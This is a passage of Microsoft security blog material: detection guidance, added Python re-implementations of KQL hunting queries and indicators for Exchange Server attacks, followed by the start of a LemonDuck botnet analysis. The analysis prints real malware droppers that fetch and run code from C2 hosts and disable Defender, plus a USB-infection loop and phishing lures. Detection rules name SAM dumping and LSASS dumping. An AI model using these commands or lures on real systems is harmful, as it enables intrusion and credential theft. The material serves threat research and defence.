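        "new_accounts": sorted(new_names),
        "new_accounts_added_to_groups": sorted(group_adds),
        "created_by_system": sorted(by_system),
        "log_cleared_at": [e.time_created for e in log_clears(events)],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_EVENTS).items():
        print(f"{key}: {value}")
```

The window matters: the `svc_backup2` and `jdoe` creations fall outside it and are not reported, while the SYSTEM-created `sysadm$` that was immediately added to a local group, followed by a log clear, is exactly the sequence the checklist describes.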
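The advanced hunting queries in the appendix of this post express their detection logic in KQL against Defender for Endpoint tables. As an added example (not Microsoft's code and not the product's query engine), the block below re-implements the same rules in Python over `DeviceProcessEvents`-style records so they can be tested offline against sample telemetry. KQL's `has` is a whole-term match; `has()`, `has_all()` and `has_any()` below approximate it with a case-insensitive match bounded by non-word characters, and `contains()` is a plain case-insensitive substring, like KQL's. The rule names, the app pool name in the w3wp command line, and all event records are constructed for the example.

```python
"""Offline re-implementation of the appendix's hunting queries.

Added example, not Microsoft's code. Each rule mirrors one KQL query from the
post; the records are constructed DeviceProcessEvents-style dictionaries.
"""
import re


def has(text, term):
    """Approximate KQL `has`: term bounded by non-word characters, any case."""
    return re.search(r"(?<![\w])" + re.escape(term) + r"(?![\w])", text, re.I) is not None


def has_all(text, terms):
    return all(has(text, t) for t in terms)


def has_any(text, terms):
    return any(has(text, t) for t in terms)


def contains(text, sub):                 # KQL contains: case-insensitive substring
    return sub.lower() in text.lower()


def eq(a, b):                            # KQL =~ : case-insensitive equality
    return a.lower() == b.lower()


# Children the Exchange IIS worker legitimately spawns; allow-listed by the query.
EXPECTED_W3WP_CHILDREN = {"csc.exe", "cvtres.exe", "conhost.exe", "oleconverter.exe",
                          "wermgr.exe", "werfault.exe", "transcodingservice.exe"}


def exchange_w3wp(e):
    """Parent is w3wp.exe running an Exchange application pool."""
    return (eq(e["InitiatingProcessFileName"], "w3wp.exe")
            and contains(e["InitiatingProcessCommandLine"], "MSExchange"))


RULES = {
    "w3wp_unexpected_child": lambda e: exchange_w3wp(e)
        and e["FileName"].lower() not in EXPECTED_W3WP_CHILDREN,
    "powershell_from_w3wp": lambda e: exchange_w3wp(e) and eq(e["FileName"], "powershell.exe"),
    "defender_tampering": lambda e: has_all(e["InitiatingProcessCommandLine"],
        ["Set-MpPreference", "DisableRealtimeMonitoring", "Add-MpPreference", "ExclusionProcess"]),
    "local_account_added": lambda e: e["FileName"] == "net.exe"
        and has_all(e["ProcessCommandLine"], ["user", "add"]),
    "comsvcs_via_rundll32": lambda e: has_all(e["InitiatingProcessCommandLine"],
        ["rundll32.exe", "comsvcs.dll"]),
    "sam_or_security_saved": lambda e: e["FileName"] == "reg.exe"
        and has(e["ProcessCommandLine"], "save")
        and has_any(e["ProcessCommandLine"], ["hklm\\security", "hklm\\sam"]),
}


def hunt(events):
    """Return (rule name, DeviceId, FileName) for every rule each event trips."""
    hits = []
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits.append((name, e["DeviceId"], e["FileName"]))
    return hits


def hunt_summary(events):
    """Hit count per rule, for a quick overview of a device's telemetry."""
    counts = {name: 0 for name in RULES}
    for name, _, _ in hunt(events):
        counts[name] += 1
    return counts


def _ev(file, cmd, parent, parent_cmd, device="host-01"):
    return {"FileName": file, "ProcessCommandLine": cmd, "InitiatingProcessFileName": parent,
            "InitiatingProcessCommandLine": parent_cmd, "DeviceId": device}


# Constructed sample telemetry (hypothetical app pool, paths and account). Record 2
# is the benign compiler spawn the query allow-lists; record 8 is ordinary admin use.
W3WP = 'c:\\windows\\system32\\inetsrv\\w3wp.exe -ap "MSExchangeOWAAppPool" -v "v4.0"'
SAMPLE_EVENTS = [
    _ev("cmd.exe", "cmd /c dir", "w3wp.exe", W3WP),
    _ev("csc.exe", "csc.exe /noconfig ...", "w3wp.exe", W3WP),
    _ev("powershell.exe", "powershell.exe -enc <base64 omitted>", "w3wp.exe", W3WP),
    _ev("conhost.exe", "conhost.exe", "powershell.exe",
        'powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true; '
        'Add-MpPreference -ExclusionProcess powershell.exe"'),
    _ev("reg.exe", "reg save hklm\\sam C:\\Windows\\Temp\\sam.hiv", "cmd.exe", "cmd /c test.bat"),
    _ev("conhost.exe", "conhost.exe", "rundll32.exe",
        "rundll32.exe C:\\Windows\\System32\\comsvcs.dll [arguments omitted]"),
    _ev("net.exe", "net user sysadm$ <password> /add", "cmd.exe", "cmd /c test.bat"),
    _ev("net.exe", "net user /domain", "cmd.exe", "cmd", device="host-02"),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Term matching is the reason the original queries use `has` rather than `contains`: `net users /add` does not trip `local_account_added`, and the benign `net user /domain` on `host-02` trips nothing. As in the post, `comsvcs_via_rundll32` and `defender_tampering` look at the initiating (parent) command line, so a child such as `conhost.exe` is what surfaces the hit.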
For comprehensive investigation and mitigation guidance and tools, see <https://aka.ms/exchange-customer-guidance>.

Additionally, here are best practices for building credential hygiene and practicing the principle of least privilege:

 * Follow guidance to run Exchange in a least-privilege configuration: <https://adsecurity.org/?p=4119>.
 * Ensure service accounts and scheduled tasks run with the least privileges they need. Avoid widely privileged groups like domain admins and backup operators and prefer accounts with access to just the systems they need.
 * Randomize local administrator passwords to prevent lateral movement with tools like [LAPS](<https://aka.ms/laps>).
 * Ensure administrators practice good administration habits like [Privileged Admin Workstations](<https://docs.microsoft.com/en-us/security/compass/overview>).
 * Prevent privileged accounts like domain admins from signing into member servers and workstations using Group Policy to limit credential exposure and lateral movement.

## Appendix

### Microsoft Defender for Endpoint detection details

**Antivirus**

Microsoft Defender Antivirus detects exploitation behavior with these detections:

 * Behavior:Win32/Exmann
 * [Behavior:Win32/IISExchgSpawnEMS](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgSpawnEMS.A&threatId=-2147212928>)
 * [Exploit:ASP/CVE-2021-27065](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:ASP/CVE-2021-27065>)
 * Exploit:Script/Exmann
 * Trojan:Win32/IISExchgSpawnCMD
 * [Behavior:Win32/IISExchgDropWebshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.B&threatId=-2147190469>)

Web shells are detected as:

 * [Backdoor:JS/Webshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/WebShell&threatId=-2147233581>)
 * [Backdoor:PHP/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:PHP/Chopper.B!dha&threatId=-2147231664>)
 * Backdoor:ASP/Chopper
 * Backdoor:MSIL/Chopper
 * [Trojan:JS/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:JS/Chopper!dha&threatId=-2147232033>)
 * Trojan:Win32/Chopper
 * [Behavior:Win32/WebShellTerminal](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/WebShellTerminal.A&threatId=-2147213299>)

Ransomware payloads and associated files are detected as:

 * [Trojan:BAT/Wenam](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:BAT/Wenam.A&threatId=-2147188992>) - _xx.bat_ behaviors
 * [Ransom:Win32/DoejoCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&threatId=-2147189904>) - DoejoCrypt ransomware
 * [Trojan:PowerShell/Redearps](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/Redearps.A&threatId=-2147189091>) - PowerShell spreader in Pydomer attacks
 * [Ransom:Win64/Pydomer](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win64/Pydomer.A&threatId=-2147189083>) - Pydomer ransomware

Lemon Duck malware is detected as:

 * [Trojan:PowerShell/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/LemonDuck.A&threatId=-2147189579>)
 * [Trojan:Win32/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/LemonDuck.A&threatId=-2147189576>)

Some of the credential theft techniques highlighted in this report are detected as:

 * [Behavior:Win32/DumpLsass](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/DumpLsass.A!attk&threatId=-2147237471>)
 * Behavior:Win32/RegistryExfil

**Endpoint detection and response (EDR)**

Alerts with the following titles in the security center can indicate threat activity on your network:

 * Suspicious Exchange UM process creation
 * Suspicious Exchange UM file creation
 * Suspicious w3wp.exe activity in Exchange
 * Possible exploitation of Exchange Server vulnerabilities
 * Possible IIS web shell
 * Possible web shell installation
 * Web shells associated with Exchange Server vulnerabilities
 * Network traffic associated with Exchange Server exploitation

Alerts with the following titles in the security center can indicate threat activity on your network specific to the DoejoCrypt and Pydomer ransomware campaign:

 * DoejoCrypt ransomware
 * Pydomer ransomware
 * Pydomer download site

Alerts with the following titles in the security center can indicate threat activity on your network specific to the Lemon Duck botnet:

 * LemonDuck Malware
 * LemonDuck botnet C2 domain activity

The following behavioral alerts might also indicate threat activity associated with this threat:

 * Possible web shell installation
 * A suspicious web script was created
 * Suspicious processes indicative of a web shell
 * Suspicious file attribute change
 * Suspicious PowerShell command line
 * Possible IIS Web Shell
 * Process memory dump
 * A malicious PowerShell Cmdlet was invoked on the machine
 * WDigest configuration change
 * Sensitive information lookup
 * Suspicious registry export

### Advanced hunting

To locate possible exploitation activities in Microsoft Defender for Endpoint, run the following queries.

**Processes run by the IIS worker process**

Look for processes executed by the IIS worker process:

```kusto
// Broadly search for processes executed by the IIS worker process. Further investigation should be performed on any devices where the created process is indicative of reconnaissance
DeviceProcessEvents
| where InitiatingProcessFileName == 'w3wp.exe'
| where InitiatingProcessCommandLine contains "MSExchange"
| where FileName !in~ ("csc.exe","cvtres.exe","conhost.exe","OleConverter.exe","wermgr.exe","WerFault.exe","TranscodingService.exe")
| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp
```

Search for PowerShell spawned from the IIS worker process, observed most frequently in Lemon Duck with Base64 encoding to obfuscate C2 domains:

```kusto
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where InitiatingProcessFileName =~ "w3wp.exe"
| where InitiatingProcessCommandLine contains "MSExchange"
| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp
```

**Tampering**

Search for Lemon Duck tampering with Microsoft Defender Antivirus:

```kusto
DeviceProcessEvents
| where InitiatingProcessCommandLine has_all ("Set-MpPreference", "DisableRealtimeMonitoring", "Add-MpPreference", "ExclusionProcess")
| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp
```

**Batch script actions**

Search for batch scripts performing credential theft, as observed in DoejoCrypt infections:

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName == "cmd.exe"
| where InitiatingProcessCommandLine has ".bat" and InitiatingProcessCommandLine has @"C:\Windows\Temp"
| where ProcessCommandLine has "reg save"
| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp
```

Look for evidence of batch script execution that leads to credential dumping:

```kusto
// Search for batch script execution, leading to credential dumping using rundll32 and the COM Services DLL, dsquery, and makecab use
DeviceProcessEvents
| where InitiatingProcessFileName =~ "cmd.exe"
| where InitiatingProcessCommandLine has ".bat" and InitiatingProcessCommandLine has @"\inetpub\wwwroot\aspnet_client\"
| where InitiatingProcessParentFileName has "w3wp"
| where FileName != "conhost.exe"
| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp
```

**Suspicious files dropped under an aspnet_client folder**

Look for dropped suspicious files like web shells and other components:

```kusto
// Search for suspicious files, including but not limited to batch scripts and web shells, dropped under the file path C:\inetpub\wwwroot\aspnet_client\
DeviceFileEvents
| where InitiatingProcessFileName == "w3wp.exe"
| where FolderPath has "\\aspnet_client\\"
| where InitiatingProcessCommandLine contains "MSExchange"
| project FileName, FolderPath, InitiatingProcessCommandLine, DeviceId, Timestamp
```

**Checking for persistence on systems that have been suspected as compromised**

Search for creations of new local accounts:

```kusto
DeviceProcessEvents
| where FileName == "net.exe"
| where ProcessCommandLine has_all ("user", "add")
| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp
```

**Search for installation events that were used to download ScreenConnect for persistence**

Note that this query may be noisy and is not necessarily indicative of malicious activity alone.

```kusto
DeviceProcessEvents
| where FileName =~ "msiexec.exe"
| where ProcessCommandLine has @"C:\Windows\Temp\"
| parse-where kind=regex flags=i ProcessCommandLine with @"C:\\Windows\\Temp\\" filename:string @".msi"
| project filename, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp
```

**Hunting for credential theft**

Search for logon events related to services and scheduled tasks on devices that may be Exchange servers. The results of this query should be used to verify whether any of these users have privileged roles that might have enabled further persistence.

```kusto
let devices =
DeviceProcessEvents
| where InitiatingProcessFileName == "w3wp.exe" and InitiatingProcessCommandLine contains "MSExchange"
| distinct DeviceId;
//
DeviceLogonEvents
| where DeviceId in (devices)
| where LogonType in ("Batch", "Service")
| project AccountName, AccountDomain, LogonType, DeviceId, Timestamp
```

Search for WDigest registry key modification, which allows the LSASS process to store plaintext passwords:

```kusto
DeviceRegistryEvents
| where RegistryValueName == "UseLogonCredential"
| where RegistryKey has "WDigest" and RegistryValueData == "1"
| project PreviousRegistryValueData, RegistryValueData, RegistryKey, RegistryValueName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp
```

Search for the COM services DLL being executed by rundll32, which can be used to dump LSASS memory:

```kusto
DeviceProcessEvents
| where InitiatingProcessCommandLine has_all ("rundll32.exe", "comsvcs.dll")
| project FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp
```

Search for Security Account Manager (SAM) or SECURITY databases being saved, from which credentials can later be extracted:

```kusto
DeviceProcessEvents
| where FileName == "reg.exe"
| where ProcessCommandLine has "save" and ProcessCommandLine has_any ("hklm\\security", "hklm\\sam")
| project InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp
```

## Indicators

Selected indicators from these attacks are included here; the threats may utilize files and network indicators not represented here.

**Files (SHA-256)**

The following are file hashes for some of the web
shells observed during attacks:

 * 201e4e9910dcdc8c4ffad84b60b328978db8848d265c0b9ba8473cf65dcd0c41
 * 2f0bc81c2ea269643cae307239124d1b6479847867b1adfe9ae712a1d5ef135e
 * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea
 * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1
 * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5
 * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d
 * 8e90ed33c7ee82c0b64078ea36ec95f7420ba435c693b3b3dd728b494abf7dfc
 * a291305f181e24fe7194154b4cd355ccb039d5765709c80999e392efec69c90a
 * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0
 * dd29e8d47dde124c7d14e614e03ccaab3ecaa50e0a0bef985ed59e98928bc13d

DoejoCrypt associated hashes:

 * 027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27
 * 10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da
 * 2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff
 * 904fbea2cd68383f32c5bc630d2227601dc52f94790fe7a6a7b6d44bfd904ff3
 * bf53b637683f9cbf92b0dd6c97742787adfbc12497811d458177fdeeae9ec748
 * e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6
 * fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65
 * feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede

Lemon Duck associated hashes:

 * 0993cc228a74381773a3bb0aa36a736f5c41075fa3201bdef4215a8704e582fc
 * 3df23c003d62c35bd6da90df12826c1d3fdd94029bf52449ba3d89920110d5ec
 * 4f0b9c0482595eee6d9ece0705867b2aae9e4ff68210f32b7425caca763723b9
 * 56101ab0881a6a34513a949afb5a204cad06fd1034f37d6791f3ab31486ba56c
 * 69ce57932c3be3374e8843602df1c93e1af622fc53f3f1d9b0a75b66230a1e2e
 * 737752588f32e4c1d8d20231d7ec553a1bd4a0a090b06b2a1835efa08f9707c4
 * 893ddf0de722f345b675fd1ade93ee1de6f1cad034004f9165a696a4a4758c3e
 * 9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719
 * 9f2fe33b1c7230ec583d7f6ad3135abcc41b5330fa5b468b1c998380d20916cd
 * a70931ebb1ce4f4e7d331141ad9eba8f16f98da1b079021eeba875aff4aeaa85
 * d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09
 * db093418921aae00187ae5dc6ed141c83614e6a4ec33b7bd5262b7be0e9df2cd
 * dc612f5c0b115b5a13bdb9e86f89c5bfe232e5eb76a07c3c0a6d949f80af89fd
 * f517526fc57eb33edb832920b1678d52ad1c5cf9c707859551fe065727587501
 * f8d388f502403f63a95c9879c806e6799efff609001701eed409a8d33e55da2f
 * fbeefca700f84373509fd729579ad7ea0dabdfe25848f44b2fbf61bf7f909df0

Pydomer associated hashes:

 * 7e07b6addf2f0d26eb17f4a1be1cba11ca8779b0677cedc30dbebef77ccba382
 * 866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc
 * 910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db
 * a387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287
 * b9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f
 * c25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a
 * c4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908

**Network indicators**

Domains abused by Lemon Duck:

 * down[.]sqlnetcat[.]com
 * t[.]sqlnetcat[.]com
 * t[.]netcatkit[.]com

Pydomer DGA network indicators:

 * uiiuui[.]com/search/*
 * yuuuuu43[.]com/vpn-service/*
 * yuuuuu44[.]com/vpn-service/*
 * yuuuuu46[.]com/search/*

The post [Analyzing attacks taking advantage of the Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) appeared first on Microsoft Security.

_Published 2021-03-25; related CVEs: CVE-2021-26855, CVE-2021-27065._

_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.]_

Combating and preventing today's threats to enterprises requires comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines—even so-called commodity malware—can bring in more dangerous threats. We’ve seen this in banking Trojans serving as an entry point for ransomware and hands-on-keyboard attacks.
LemonDuck, an actively updated and robust malware that’s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

LemonDuck’s threat to enterprises is also in the fact that it’s a cross-platform threat. It’s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms—phishing emails, exploits, USB devices, brute force, among others—and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.

This threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.

In the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.

_Figure 1. Global distribution of LemonDuck botnet activity_

In 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.

In-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.

## LemonDuck and LemonCat infrastructure

The earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.

LemonDuck is named after the variable “Lemon_Duck” in one of those PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: “User-Agent: Lemon-Duck-[A-Z]-[A-Z]”. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user agent during botnet connection in attacks as recently as June 2021.

LemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.

The first, which we call the “Duck” infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, is more likely to have random display names for its C2 sites, and is always observed using “Lemon_Duck” explicitly in its scripts.

The second infrastructure, which we call the “Cat” infrastructure—for primarily using two domains with the word “cat” in them (_sqlnetcat[.]com_, _netcatkit[.]com_)—emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.

**Sample Duck domains**

 * cdnimages[.]xyz
 * bb3u9[.]com
 * zz3r0[.]com
 * pp6r1[.]com
 * amynx[.]com
 * ackng[.]com
 * hwqloan[.]com
 * js88[.]ag
 * zer9g[.]com
 * b69kq[.]com

**Sample Cat domains**

 * sqlnetcat[.]com
 * netcatkit[.]com
 * down[.]sqlnetcat[.]com

The Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as “blackball”. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.

The fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, their core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.

_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_

## Initial access

LemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.

LemonDuck acts as a loader for many other follow-on activities, but one of its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).

Once inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.

Because of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don’t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.

From mid-2020 to March 2021, LemonDuck’s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.

**Sample email subjects**

 * The Truth of COVID-19
 * COVID-19 nCov Special info WHO
 * HALTH ADVISORY:CORONA VIRUS
 * WTF
 * What the fcuk
 * good bye
 * farewell letter
 * broken file
 * This is your order?

**Sample email body content**

 * Virus actually comes from United States of America
 * very important infomation for Covid-19
 * see attached document for your action and discretion.
 * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.
 * what's wrong with you?are you out of your mind!!!!!
 * are you out of your mind!!!!!what 's wrong with you?
 * good bye, keep in touch
 * can you help me to fix the file,i can't read it
 * file is brokened, i can't open it

The attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named “readme”. Occasionally, all three types are present in the same email.

_Figure 3. Sample email_

While the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).

Since LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development.
Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. 
These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 